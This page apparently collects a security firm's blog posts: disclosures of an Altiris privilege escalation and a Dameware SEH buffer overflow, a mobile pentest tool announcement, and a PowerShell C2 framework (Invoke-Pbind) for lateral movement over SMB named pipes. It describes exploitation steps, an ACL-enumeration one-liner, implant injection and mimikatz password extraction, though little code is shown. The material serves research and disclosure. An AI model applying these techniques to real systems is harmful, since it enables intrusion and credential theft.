CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability within the latest versions of the Symantec Management Agent (Altiris), that allowed us to escalate our privileges.

Overview

When the Altiris agent performs an inventory scan, e.g. software inventory scan, the SYSTEM level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to create a junction to an alternative folder. Thus, the ‘Everyone’ permission is placed on the junction folder, enforcing inheritance on each file or folder within this structure.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version that this was tested by Nettitude was version 7.6, as shown throughout this release, however it was confirmed by Symantec on 12 June 2018 that all versions prior to the patched version are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, from what we believed to be the inventory scan or output from a recent task. These folder and file permissions were found using a simple PowerShell one liner which allowed us to perform an ACL review on any Windows host, using only the tools on that host. An example of this one liner is as follows:

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation

(See: https://gist.github.com/benpturner/de818138c9fcf8e1e67368a901d652f4)

When reviewing the timestamp on these folders, it appeared there was activity happening once a day within this folder. After doing further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Now, depending on the relevant organisations configuration and appetite for inventory management, this may happen more or less than once per day.

Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (awesome post by Ryan Hanson incoming) to see if this type of attack would be possible here:

Here is the folder permissions that we identified on the ‘NSI’ folder. These permissions were also the same on the ‘Outbox’ folder.

We then attempted to redirect the folder to another location using James Forshaw’s symboliclink-testing-tools to create a mount point to another folder and see if those files were written, which was successful. It was also possible to use the junction tools from sysinternals (https://docs.microsoft.com/en-us/sysinternals/). The only problem with the sysinternals junction tool is that it requires the source folder to not exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we were to completely delete this folder we would not have the correct permissions to recreate this attack. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Another tool that could be used for this type of attack is called mklink.exe from Windows, but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To completely understand what process was overwriting these permissions, we uploaded Process Monitor from sysinternals (https://docs.microsoft.com/en-us/sysinternals/) to see what was going on under the hood. As you can see from the output below, all files and folders were getting a DACL applied by the AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways you could choose to make this vulnerability exploitable, but the path of least resistance was trying to override the entire root Altiris folder (“C:\Program Files\Altiris\Alritis Agent\”) permissions so that we could modify the service binary running under the SYSTEM account, namely AeNXSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeNXSAgent.exe service binary, before modifying the mount point to overwrite the permissions:

We then created a mountpoint which points to the folder ‘Altiris Agent’. It’s worth noting that this folder must be empty for the redirection to be possible. Since we have full permissions over every file, this was trivial to complete. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning, and the next screenshot shows the outcome. As we expected the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including the AeNXSAgent.exe.

Once we had full control over AeXNSAgent.exe we could then replace the service binary and reboot the host to obtain SYSTEM level privileges. It is worth noting that privilege escalation vulnerabilities in symlinks are fairly common and James Forshaw himself has found well over twenty as shown here:

Conclusion

This vulnerability affected all versions of Altiris Management Agent, namely up to v7.6, v8.0 and 8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities on run-time and/or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed (https://support.symantec.com/en_US/article.SYMSA1456.html) – 25 July 2018
  • Nettitude release further information – 12 September 2018

CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version (at the time of writing) for Dameware MRC (12.0.5) and it has been assigned CVE-2018-12897. This vulnerability is due to insecure handling of a user input buffer which ultimately allows for overwriting Structured Exception Handler (SEH) addresses and the subsequent hijacking of execution flow.

Below is a video demonstration of exploitation for proof of concept of this vulnerability.

Solarwinds have been contacted about this issue who have acknowledged it and have released a version which reportedly contains the fix for the vulnerability, version 12.1. However, at the time of writing, this version doesn’t appear to be available from the customer portal and if you are affected by this issue, it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within in the GUI has several input fields. The majority of these fields lack appropriate input sanitization, leading to crashes when entering a large amount of input (more than 3,000 characters). However, for the proof of concept, only one of these fields was used; the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it may be necessary to fuzz input fields and parameters, an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour, however this was not the case in this instance. Simply using a large number of A’s (over 2000) or any other character would result in the application terminating unexpectedly.

Looking at this process in a debugger, it becomes clear what is happening. The input is being written to the stack and has overflown the SEH addresses. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed how they were entered and have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable set of “POP, POP, RET” instructions. The buffer length before the overflow was identified using Metasploit’s helpful “pattern_create” and “pattern_offset” utilities, taking care to observe the bytes surrounding the overflow as the null bytes have to be discounted. As the DWRCC.EXE (main executable) is not being rebased on each execution, the instruction set found at address “0x00439D7D” was chosen. The executable was compiled without common protections, including ASLR which would have made hardcoding an address in the shellcode infeasible.

The next step is to overwrite the SEH and next SEH addresses with the address of the instruction found above and the op codes for a small jump over that address. Once executed, the execution flow should be then directed into the area of memory on the stack under our control. For both the address and the jump, UTF-16 characters were used so to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit which is the first hurdle down, now we just need to make sure it returns back and executes the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used will need to be UTF-16 compatible. Luckily the alpha2 encoder in Metasploit has the ability to generate UTF-16 compatible shellcode. However, the one caveat is that it requires that a register holds the address of the beginning of the shellcode when the shellcode is executed. To achieve this, an offset would need to be calculated from an address which is unchanging on each runtime independent of the operating system version.

After taking into account the offset, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” could be used to execute operations in between the null bytes to get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me and so I thought I would give it a go here to see how it works using the simplest form of venetian shellcode There are some fantastic write-ups which discuss this technique and its history including Corelan’s tutorials and Fuzzysecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations, they can be bypassed but they still offer an added layer of protection to help prevent or increase the complexity required for exploitation of buffer overflows. These are not new and have been around for a good while now, its 2018 and yet still many applications are being compiled without these protections.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed which will lead to a crash but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overflow Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by creating a symbolic record at the end of the records and, at the point when an exception is raised, it checks to make sure that this is still present, thereby determining the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy settings.

An older protection mechanism known as SAFESEH, can be set via a compilation flag. This works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, one being including the requirement to recompile binaries with this flag to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience and I fully recommend), I was looking to find something I could use my new found skill set to practise on. Finding this (while not the most exciting) was certainly rewarding and taught me some additional techniques that I may not have otherwise come across. However, the teaching was done by security professionals who have written some insanely useful and easy to follow tutorials. I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for Venetian Shellcode can be found below but the entire set of guides are invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacts Nettitude to inform them that version 12.1 has been released which contains a fix for the reported issue.
  • 06 September 2018 – Public disclosure

Introducing Scrounger – iOS and Android mobile application penetration testing framework

Scrounger is a modular tool designed to perform the routine tasks required during a mobile application security assessment.  Scrounger conveniently brings together both major mobile operating systems – Android and iOS – into a single tool, in a way that is easy use, well documented, and easily extensible.

Where it differs

Scrounger consists on a number of modules that were built on top of a strong core. The rationale is to allow easy extensibility, just like Metasploit does. As a result, if you want Scrounger to perform additional checks, you can simply add a new module that can then be executed either through Scrounger’s interactive console or its command line interfaces.

Furthermore, it contains both Android and iOS modules, so, instead of using multiple tools to help you during a mobile application assessment, Scrounger offers you the possibility to use only one tool and learn only one set of commands, that will work for both operating systems.

Scrounger already comes bundled with several modules that can be run to perform several checks against mobile applications.

Requirements

Scrounger has a few requirements, such as the installation of certain packages on the host and certain iOS binaries.

However, it already packs most of the iOS binaries and offers a module that installs them on the device. The package requirements are also specified on the Scrounger GitHub page.

If the prerequisites are not satisfied, Scrounger will simply not run certain modules. All the modules with prerequisites that are satisfied will run without any problems.

The other main requirement is to have jailbroken and rooted devices.

Usage

There are two main ways of using Scrounger: command line or interactive console.

The command line will be used mainly when performing all checks or making any automation scripts. On the other hand, the console will be used to run only a certain number of modules or when performing specific actions such as, decompiling, recompiling and signing applications, extracting certain files, etc.

Command line options

When using the command line, you can list the available modules and their arguments, list the available devices, run a full analysis (which runs all the modules for a certain type of application – Android or iOS) and run a specific module while passing the required arguments.

Here is an example of running a specific module, using the command line Scrounger, on an Android application.

First, we start by listing the required options for the module that we want to run and then we run it.

Console Examples

The console is the main attraction. It is packed with several powerful options and there is plenty of room for further improvements. The console already offers autocomplete (including file path autocomplete), module search, the ability to re-use results from other modules as arguments, command history between usages and the ability to reverse search the used commands.

Here is an example of the console listing specifically the available modules for iOS.

When listing modules, a brief description of what the module does will also be displayed. For both iOS and Android there are two main types of module, misc and analysis. The misc modules are auxiliary modules that perform several actions against the applications, their files and/or devices. In order to assess if there are any security flaws, the analysis modules analyses either the application files, the application itself or the application-generated files.

First, we run the command options to show the required arguments for the specific module (as you would when using Metasploit). The options command also shows the global options. If this is set and a module with the same argument is used, its value will be automatically set. Once the required arguments are set, we run options again to make sure that everything is set properly and run the module using the command run.

As we can see, Scrounger will generate some output and results from running certain modules. These results can then later be used by other modules.

We can use the command show results to see all stored results returned by the execution of other modules. The print command can be used to show the value stored on a certain result, but also to print values stored in global or module arguments. If a result is of interest to run in another module, it can be used by setting the required argument with the desired result starting with the result: keyword. When setting these arguments, autocomplete will also look in the saved results table and suggest them. Once everything is set, we can simply run the module.

Device Examples

Several modules will require interaction with either an iOS or Android device. It is quite easy to add a device both in the command line or in console.

In this example, an Android device is added to the console using the add_device command (this also offers autocomplete: it will try to get the connected devices and show them as an option). Then, using the set global command, we set the device to be device 1 . When using the misc/list_apps command, since the global option is already set and there is a module argument with the same name, it will automatically fill in the value for that argument.

Extensibility

Scrounger can also be easily extended to include custom modules and perform custom checks depending on the pentesters preference (and we welcome submissions to be included in future releases of Scrounger). When installing Scrounger, all the necessary directories will be created for you. It creates a custom modules directory under ~/.scrounger/modules/custom.
In the following example, a custom module was created under custom/analysis/ios/false_positive, meaning that this false_positive module is run against iOS applications.

Creating your own module

To create a custom module is quite simple and requires only three steps: creating a file under the correct module directory depending on what your module is looking to do, creating two variables meta and options, as well as a function run.

Here is an example.

 

The newly created file will be automatically added to the list of available modules the next time scrounger-console is launched. There are a few more elements to consider when it comes to creating the modules, especially analysis modules. For full details, Scrounger offers comprehensive documentation on all the available modules and a detailed explanation on how to create custom ones: https://github.com/nettitude/scrounger/docs

Real life case scenario

On a typical mobile application assessment, we would try to run as many modules as possible. To facilitate that, there is a module that runs all modules called full_analysis in the console and an option -f in the command line.

This option/module will decompile the application and run all the necessary auxiliary modules and run all the other available modules. It then creates a JSON file that contains the results and details of each module that returned report=True. The command line executable also has an option ( -p) that will read a JSON file and print all the results and details to the console.

Future work, feedback & special thanks

There is a lot in store for Scrounger’s future.

The next features to be implemented are included in the last section of the README in Scrounger’s GitHub: https://github.com/nettitude/scrounger.

Any feedback, ideas or bugs can be submitted over on GitHub.

Additionally, a special thanks to all the existing tools and their developers, as they have contributed to bringing Scrounger to life. Just to mention a few:

Download

github GitHub: https://github.com/nettitude/scrounger

Extending C2 Lateral Movement – Invoke-Pbind

Invoke-Pbind is a mini post exploitation framework written in PowerShell, which builds C2 communications over SMB named pipes using a push rather than a pull mechanism. Pbind was initially created to overcome lateral movement problems, specifically in restricted environments where the server VLAN could not directly talk to the user VLAN (as it should be in every environment). The tool was designed to be integrated with any C2 framework or run as a standalone PowerShell script.

Video Demonstration

If you just want to skip to the video tutorial, then you can find that here and at the end of this post.

The Problem: Segregation and Strict Firewalling

This is useful when you have compromised an organisation and have C2 comms over HTTPS, traversing the corporate proxy server out of the network from user’s workstations, but the target dataset that you are looking to obtain is located down server VLAN with a firewall restricting both inbound and outbound traffic. In that scenario, firewall rules are always going to allow for specific traffic to traverse over pre-approved services. The following diagram illustrates one such situation, where the environment allows limited services from the user VLAN to the server VLAN, but allows no ports in the reverse direction.

What options exist for C2 comms

The following are some options for C2 comms and their mitigations, resulting in failure.

Method Mitigation Result
Direct Internet Access Blocked by Firewall Outbound Fail
Traverse Through HTTP Proxy Blocked by Firewall Outbound Fail
TCP Reverse Shell Blocked or likely detected scanning for open ports Fail
TCP Bind Shell Blocked by Firewall Inbound or service running on open ports, no closed ports detected Fail
ICMP Blocked by Firewall Outbound Fail
Daisy over SMB in User VLAN TCP port 445 blocked from servers to workstations Fail
Daisy over HTTP in User VLAN Same as standard reverse all blocked ports Fail
DNS Authoritive DNS is only permitted by the Proxy server, thus not possible for C2 comms from the server VLAN. Fail

To be clear, at this point the problem isn’t about getting execution, it’s about having reliable C2 comms that afford the user output for all commands executed and to use the implant as a foothold or staging point to further attacks against servers in the restricted environment.

The Solution

“A named pipe is a logical connection, similar to a Transmission Control Protocol (TCP) session, between the client and server that are involved in the CIFS/SMB connection. The name of the pipe serves as the endpoint for the communication, in the same manner as a port number serves as the endpoint for TCP sessions. This is called a named pipe endpoint.” – https://msdn.microsoft.com/en-us/library/cc239733.aspx.

.NET has a class for creating and interacting with named pipes:

Where TCP port 445 is open into a server environment, we can overlay the SMB protocol and use a named pipe to share data between the workstation and server, providing a method for exchanging data (comms). The following commands make up the basis of creating a named pipe with an access rule that allows “everyone” access:

Since the days of abusing IPC$ with anonymous access (CVE-199-0519), and RID cycling your way to a plethora of goodies, Microsoft have said “no – though shall not pass” – non Microsoft direct quote. In a domain environment, any user can create a domain authenticated session to the $IPC share, which can then be piggy backed to gain access to the named pipe. Here is a simple script in PowerShell to create an authenticated session. One quick problem to overcome: While the ‘AccessRule’ applied to the pipe may look like it allows “everyone” access to the named pipe, this is not actually the case.

Interacting with a named pipe is also fairly straight forward as long as you know the data type of what is being read; as we create the server we know how to handle to pipe as shown by using a simple StreamReader:

Design

When we came up with Invoke-Pbind, the following principles were implemented.

Client/Server Model

To allow for inclusion in a C2 framework, two script blocks were created, client and server. The server starts and sets up the named pipe on a remote target (server). The client then connects to the named pipe and exchanges messages over TCP port 445 (SMB). The client runs through an existing C2 implant and by using script blocks and run spaces, it is possible to use the client non-interactively for better interaction with most C2 frameworks.

Token Passing

When sharing a common space such as a named pipe, it is imperative that messages exchanged between the client and server are not overwritten prior to being picked up by their counterpart. Control messages are used in combination with TRY and IF statements to create rules for when a client or server should read or write from the named pipe.

Security

During the generation of the script blocks, at run time, a unique key is generated and used to encrypt messages between client and server. Pbind supports AES 256 encryption. To initiate a connection to the named pipe from a client, a shared secret is also supported to stop tampering with the named pipe. If the client does not provide the correct secret, the named pipe will close.

Injection/Execution

There are two main methods included that inject the implant into target hosts. These are modified versions of Invoke-WMIExec and Invoke-SMBExec (credit to Kevin Robertson for these scripts); both scripts have been updated to support passing passwords, where previously they only accepted hashes for authentication. The implant is a self-executing script block that is passed as the payload. The script runs WMIExec by default but contains a switch parameter to invoke SMBExec:

To provide additional deployment flexibility the script also includes an exe method. This method uses CSC and Windows .Net automation DLL to compile the implant into an executable that can then be deployed and executed through any means.

NOTE: Creating a named pipe does not require administrator credentials so the executable can be run as a non-privileged user. On the other hand, WMIExec and SMBExec require administrator privileges.

The exe option continues to generate unique variables that are hardcoded into the executable, for use in cryptography and such like. The exe option can be used offline to create an executable implant and is not tied to an interactive session through a C2. To talk to the implant, the script supports a CLIENT option that is used to interact with a deployed implant, the options for which are provided when the implant is compiled:

This flexibility allows for the deployment through any means:

  • DCOM
  • RDP
  • Shared Folders
  • WinRM
  • SCCM
  • Anything……

There are a number of options that are configurable. If no options are selected, the script reverts to pre-set or randomly generated values. The following options are configurable:

  • KEY – Defaults to a randomly generated AES 256 Key – Allows for a key to be specified, commonly used in client mode.
  • SECRET – Defaults to random 5 character value – Allows for specific secret to be used.
  • PNAME – Defaults to random 8 character value – Allows for specific pipe name to be chosen.
  • TIMEOUT – Defaults to 60 second – Used to change the wait time for the client to connect to the Implant, used in slow networks.
  • EXE – Generates a stand-alone executable;
  • CLIENT – Runs the script in client mode to connect to a deployed Executable;
  • TARGET – used to specify a remote IP Address.
  • Domain/User/Password/Hash – used to provide credentials for authentication.
  • Domain2/User2/Password2 – used to map a drive to the target system, when a hash is being used as the primary authentication mechanism.
  • Dir – used in EXE mode to output the generate executable.
  • Automation – used in EXE mode, directory location of the Automation DLL.

Interaction

There are 3 main functions that have been created to interact with the implant from a client. The first and probably the most useful, especially when we introduce templates, is Pbind-Command. This simply registers a command in a variable that is read in by the client and passed to the implant (server) before being executed. A simple example is shown below:

Pbind-module c:\folder\powerup.ps1The second is Pbind-Module, which allows you to read in any other ps1 file and have it injected into memory on the implanted host. Pbind-Command can then be used to execute any of the functions in the ps1 script. This has a limitation and does not work well within a C2 setup, because all scripts have to be local to the client. In most cases the client is already running on a target workstation and would require all scripts to be uploaded to the client before being sent on to the implant.

Pbind-Squirt was a designed to help resolve the limitations of Pbind-Module. The idea for this function was to embed a number of scripts as base64 objects into the script that can then be called and auto executed into memory on the client. The only one that has been embedded is PowerUp, to assist with asset review on newly implanted hosts.

However, in practice neither Pbind-module nor Pbind-squirt were optimal and instead a new solution was constructed, called ‘Templates’. Effectively this was just a better way to interact with the Pbind-Command function. It was decided that by creating a number of small scripts which can automate tasks, it is possible to carry out similar ideas to Pbind-module and Pbind-squirt. Tasks such uploading mimikatz and extracting passwords, uploading PowerView and running queries or uploading invoke-SMBExec and attacking other machines, can all be scripted using a similar template to the one below:

The best way to see how the script runs is to download the script and have a go. The screenshot below shows a simple example of running the script locally under the context of another user, while also executing commands.

Video Tutorial

We have created a video tutorial to help illustrate the use of Invoke-Pbind.

Download

github GitHub: https://github.com/nettitude/PoshC2/blob/master/Modules/Invoke-Pbind.ps1